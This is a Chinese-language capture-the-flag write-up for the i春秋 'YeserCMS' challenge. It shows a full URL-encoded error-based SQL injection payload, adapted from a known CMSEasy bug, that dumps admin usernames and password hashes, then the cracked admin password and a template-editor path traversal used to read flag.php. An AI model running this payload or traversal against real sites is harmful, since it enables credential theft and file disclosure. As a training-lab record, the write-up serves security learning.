YeserCMS

i春秋上的一道题，做个记录。说新的CMS系统，帮忙测测是否有漏洞。tips，flag在网站根目录下。
访问flag，显示flag_is_here。
通常思路如下：
第一步，判断CMS类型。
第二步，查询CMS可以利用的漏洞。
第三步，通过漏洞得到管理员账号，登陆后台
第四步，上传一句话getshell。

浏览了网站，发现没有标志什么CMS，将它右上角的“手机版 - 购物车 - 留言 - 繁体 - 注册 / 登陆”，去搜索，可以找到一堆一样结构的网站。有些标注了使用的CMS。

图片.png

搜索下cmseasy的漏洞

图片.png

这个cmseasy 无限制报错注入可以利用，稍微修改下原payload，将cmseasy_user改为yesercms_name，如下：

xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx%2527%252C%2528UpdateXML%25281%252CCONCAT%25280x5b%252Cmid%2528%2528SELECT%252f%252a%252a%252fGROUP_CONCAT%2528concat%2528username%252C%2527%257C%2527%252Cpassword%2529%2529%2520from%2520yesercms_user%2529%252C1%252C32%2529%252C0x5d%2529%252C1%2529%2529%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%2529--%2520</q></xjxquery>

然后在http://7d919462dc574d2e85bcd0bf0654734366f837cda98349ad.changame.ichunqiu.com/celive/live/header.php页面，post以上数据。得到admin和密文（一次显示不全，调整一下即可），为admin|ff512d4240cbbdeafada404677ccbe61，将其MD5解密，得到密码为yeser231。
扫描目录，得到后台，登录。
开始找上传点，，好像没有。

原来有个文件读取漏洞，在模板文件是直接被读取的，随便编辑一个，抓包，将id改为flag.php , ../flag.php , ../../flag.php读取到flag。
好像一般在模板处都有可利用的。

总结：利用搜索引擎得到信息，查询可利用的漏洞。